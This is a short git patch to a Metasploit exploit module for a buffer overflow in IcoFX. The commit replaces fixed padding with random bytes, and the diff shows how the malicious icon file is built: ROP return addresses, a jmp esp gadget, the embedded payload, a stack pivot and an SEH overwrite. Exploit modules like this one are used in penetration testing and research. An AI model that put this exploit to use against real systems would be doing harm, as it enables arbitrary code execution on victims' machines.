From b4439a263bb20ef6f2f66e7652389f8d65e47c30 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 31 Dec 2013 16:06:25 -0600 Subject: [PATCH] Make things random --- modules/exploits/windows/fileformat/icofx_bof.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index d7aee68985..1def45cf42 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote # ICONDIRENTRY structures 102 structures are using to overwrite # every structure = 16 bytes # 100 structures are used to reach the local variables - ico << "A" * 652 + ico << rand_text(652) ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods ico << [0x0045cc21].pack("V") # jmp esp ico << payload.encoded - ico << "B" * ( + ico << rand_text( 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100 - 652 - # padding + 652 - # padding to align the stack pivot 80 - # rop nops size 4 - # jmp esp pointer size payload.encoded.length @@ -86,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote # The next ICONDIRENTRY allows to overwrite the interesting local variables # on the stack ico << [2].pack("V") # Counter (remaining bytes) saved on the stack - ico << "A" * 8 # Padding + ico << rand_text(8) # Padding ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler # The next ICONDIRENTRY allows to overwrite the seh handler ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret - ico << "B" * (0xc) # padding + ico << rand_text(0xc) # padding return ico end